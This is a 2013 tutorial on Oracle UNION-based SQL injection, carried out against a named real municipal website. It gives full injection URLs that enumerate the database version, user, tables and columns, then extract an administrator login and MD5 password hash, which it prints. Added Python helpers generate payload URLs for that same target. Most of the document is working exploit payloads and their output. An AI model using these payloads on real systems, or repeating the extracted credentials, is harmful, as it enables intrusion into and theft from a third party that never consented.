Monday, 2 December 2013

This is a tutorial on Oracle-based SQL injection, worked through on the following site:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122

Start with ORDER BY to count the columns of the injected query:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1

Look under the picture: the breadcrumb stays as it was.
Sei in : Home -> Citta' -> Congressi
(Italian: "You are in: Home -> City -> Conferences")

At ORDER BY 7 the page changes, because there is no seventh column to sort on and the query fails; the breadcrumb loses its last element:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207
Sei in : Home -> Citta' ->

ORDER BY 6 is the highest value that still renders the page normally, so the query has 6 columns.

Time for UNION SELECT:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null

Nothing changes: the page still renders the original row, so this does not reveal which column is echoed. Put a string value into one column at a time and watch how the page reacts. Start with the first column:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version

Nothing is shown at all, so the first column does not accept a string. Try the second:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version

The page renders normally again (the breadcrumb shows "Congressi"), so the second column accepts a string: this is the column to use. The original row is still the one displayed, though. To make the UNION row the only result, change id_categoria to a value that matches no category, such as null:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,banner,null,null,null,null%20from%20v$version

version: CORE 9.2.0.6.0 Production


CURRENT USER

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--
output=WWWTARANTO

A negative id_categoria works like null above: no category matches, so only the UNION row is rendered, and the trailing -- comments out whatever the server appends to the query.

CURRENT DATABASE

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--

output=CSTTA

Another way to get the same information:
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,global_name,NULL,NULL,NULL,NULL from global_name-- -



Time to get the tables.

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,table_name,null,null,null,null from (select ROWNUM r,table_name from (select table_name from all_tables order by table_name)) where r=130

This returns table number 130 in alphabetical order; change r to step through the list. Oracle has no LIMIT/OFFSET here, so the rows are numbered with ROWNUM in a subquery. ROWNUM is assigned before ORDER BY is evaluated, which is why the ordered query is wrapped in its own subquery and ROWNUM is attached outside it: the shorter form "select ROWNUM r,table_name from all_tables order by table_name" numbers the rows in retrieval order, and r=130 is then not the 130th name alphabetically.

Time to get this table's columns:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,column_name,null,null,null,null from (select ROWNUM r,column_name from all_tab_columns where table_name='RESULT$') where r=3

Change r here too. This query has no ORDER BY, so the numbering follows whatever order Oracle returns the rows in; wrap an ordered subquery as above if you need a stable order.

Retrieving user-created tables and their columns from USER_TAB_COLUMNS. Oracle's CONCAT() takes exactly two arguments, so the || operator is used to join strings instead (chr(58) is the ':' separator), and RAWTOHEX() returns the result as hex so it comes through the page intact.

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--

54425F414C424F3A444154415F45534543555A494F4E45
Convert this hex value to a string:
TB_ALBO:DATA_ESECUZIONE
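As an added example (not code from the original post), the following Python helpers build the UNION payloads used in this tutorial and decode their output: the column count and displayed column come from the ORDER BY and UNION steps above, the ROWNUM subquery follows the table-listing step, and the CHR() encoder produces the quote-free literals that the comparisons further down rely on. The target URL, the -122 / id_news=491 values and the hex strings are the post's; the helper names and the Latin-1 decoding are assumptions of this example.

```python
# Added example, not code from the original post. Builds the Oracle UNION payloads
# used in this tutorial and decodes their RAWTOHEX output. The target URL, column
# count (6), displayed column (2nd) and the -122 / id_news=491 values come from the
# post; the helper names are this example's own.
from urllib.parse import quote

BASE = "http://www.comune.taranto.it/citta/dettaglio_news.php"
NCOLS = 6      # ORDER BY 6 renders normally, ORDER BY 7 breaks the page
VISIBLE = 1    # 0-based index of the SELECT column the page echoes (the 2nd)


def union_payload(expr, from_clause="dual"):
    """'union select NULL,<expr>,NULL,... from <from_clause>' with expr in the
    displayed column. NULL in every other slot is type-compatible with whatever
    the original SELECT returns there."""
    cols = ["NULL"] * NCOLS
    cols[VISIBLE] = expr
    return "union select " + ",".join(cols) + " from " + from_clause


def chr_literal(s):
    """Spell a string as CHR(n) || CHR(n) ... so the payload needs no quotes."""
    return " || ".join("CHR(%d)" % ord(ch) for ch in s)


def nth_row(column, table, n, where=None):
    """Oracle has no LIMIT/OFFSET here, so number the rows with ROWNUM.
    ROWNUM is assigned before ORDER BY is evaluated, so it is attached in a
    query *outside* the ordered subquery; 'select ROWNUM r,x from t order by x'
    would number rows in retrieval order, not sorted order."""
    w = " where " + where if where else ""
    ordered = "select %s from %s%s order by %s" % (column, table, w, column)
    numbered = "select ROWNUM r,%s from (%s)" % (column, ordered)
    return union_payload(column, "(%s) where r=%d" % (numbered, n))


def url_for(payload, id_news=491):
    """Full URL: -122 matches no category, so only the UNION row is rendered,
    and '--' comments out the remainder of the server-side query."""
    return "%s?id_news=%d&id_categoria=-122%%20%s--" % (BASE, id_news, quote(payload))


def decode_rawtohex(hexstr):
    """Reverse RAWTOHEX(): the hex digits are the bytes of the original string
    (assumed single-byte encoded, hence Latin-1)."""
    return bytes.fromhex(hexstr.strip()).decode("latin-1")


if __name__ == "__main__":
    # Current user, the 130th table name alphabetically, the 3rd column of
    # RESULT$ with the table name spelled as a CHR() chain, and a hex decode.
    print(url_for(union_payload("user")))
    print(url_for(nth_row("table_name", "all_tables", 130)))
    print(url_for(nth_row("column_name", "all_tab_columns", 3,
                          "table_name=" + chr_literal("RESULT$"))))
    print(decode_rawtohex("54425F414C424F3A444154415F45534543555A494F4E45"))
```

The only Oracle-specific pieces are the ROWNUM wrapping and CHR()/RAWTOHEX; everything else is plain URL building, so the same helpers work for any page that echoes one column of the injected SELECT.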

To find the next column of table TB_ALBO, ask for a row whose column_name sorts after the one just found:

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

The CHR() chain spells the string without needing quote characters:
Code:
CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE

54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE

Repeating this with > on the last value retrieved walks through the columns. Note that the query has no ORDER BY, so the row that comes back is simply the first one Oracle produces that satisfies the condition, and the condition is on column_name alone, not on the table. The walk can therefore produce an error or jump to a different table; when that happens, move on to the next table.

MOVING TO NEXT TABLE

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--

(the CHR() chain spells TB_ALBO)

54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE

MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

(table_name > TB_ALBO and column_name > DESCRIZIONE)

54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID

This condition requires both parts to be greater, so any column of TB_ALBO_DOCUMENTO whose name sorts before DESCRIZIONE can never be returned by it, and columns of later tables are mixed in. The condition for the true successor of the last row in (table_name, column_name) order is table_name > 'TB_ALBO_DOCUMENTO' or (table_name = 'TB_ALBO_DOCUMENTO' and column_name > 'DESCRIZIONE'), with the two string literals written as CHR() chains as above.
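To show what the two "greater than" conditions above actually enumerate, here is an added example (not code from the original post) that walks a small constructed copy of USER_TAB_COLUMNS in SQLite, once with the post's "table_name > X and column_name > Y" condition and once with the composite-key successor condition, and then emits the successor query in the Oracle form that fits into the post's UNION slot. The table names and columns in CATALOGUE are made up for the example and are not the target's real catalogue; the function names are this example's own.

```python
# Added example, not code from the original post. Compares the post's
# "table_name > X and column_name > Y" walk with a true composite-key successor,
# using a constructed copy of USER_TAB_COLUMNS in SQLite; the table contents are
# made up and are not the target's real catalogue.
import sqlite3

CATALOGUE = [  # constructed sample, listed in (table_name, column_name) order
    ("TB_ALBO", "DATA_ESECUZIONE"),
    ("TB_ALBO", "DATA_PUBBLICAZIONE"),
    ("TB_ALBO", "ID"),
    ("TB_ALBO_DOCUMENTO", "DESCRIZIONE"),
    ("TB_ALBO_DOCUMENTO", "ID"),
    ("TB_UTENTE", "LOGIN"),
    ("TB_UTENTE", "PASSWORD"),
]


def open_catalogue():
    db = sqlite3.connect(":memory:")
    db.execute("create table user_tab_columns(table_name text, column_name text)")
    db.executemany("insert into user_tab_columns values (?, ?)", CATALOGUE)
    return db


def next_row_naive(db, table, column):
    """The post's condition: both parts must be greater, so a column whose name
    sorts below the previous one is skipped even when its table is new."""
    return db.execute(
        "select table_name, column_name from user_tab_columns"
        " where table_name > ? and column_name > ?"
        " order by table_name, column_name limit 1", (table, column)).fetchone()


def next_row_keyset(db, table, column):
    """True successor of (table, column) in lexicographic order."""
    return db.execute(
        "select table_name, column_name from user_tab_columns"
        " where table_name > ? or (table_name = ? and column_name > ?)"
        " order by table_name, column_name limit 1", (table, table, column)).fetchone()


def walk(step, db):
    """Pull one row per query, feeding each result back in, until nothing is left."""
    rows, cur = [], ("", "")
    while True:
        cur = step(db, *cur)
        if cur is None:
            return rows
        rows.append(cur)


def chr_literal(s):
    """Quote-free string literal; CHR(0) sorts below everything and seeds the walk."""
    return " || ".join("CHR(%d)" % ord(ch) for ch in s) if s else "CHR(0)"


def oracle_successor_expr(table, column):
    """The keyset query as an Oracle inline view usable in the post's UNION slot:
    ORDER BY inside, ROWNUM = 1 outside (ROWNUM is assigned before sorting), and
    string literals spelled as CHR() chains like the post's payloads."""
    t, c = chr_literal(table), chr_literal(column)
    return ("(select x from (select table_name||chr(58)||column_name x"
            " from user_tab_columns where table_name > %s"
            " or (table_name = %s and column_name > %s)"
            " order by table_name, column_name) where ROWNUM = 1)" % (t, t, c))


if __name__ == "__main__":
    db = open_catalogue()
    print("post's walk :", walk(next_row_naive, db))   # reaches 3 of the 7 rows
    print("keyset walk :", walk(next_row_keyset, db))  # reaches all 7, in order
    print(oracle_successor_expr("TB_ALBO_DOCUMENTO", "DESCRIZIONE"))
```

The SQLite LIMIT 1 only stands in for the Oracle "ORDER BY inside, ROWNUM = 1 outside" wrapping in the simulation; the Oracle expression returned by oracle_successor_expr is what would go into the displayed column of the UNION, with -122 and the trailing -- around it as in the rest of the post.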

EXTRACTING DATA

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--

61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264

administrator:9f21eddc68ef38787fb5ef91991bea2d

The stored password is a 32-character hex string (128 bits), the length of an MD5 digest, rather than the cleartext password.
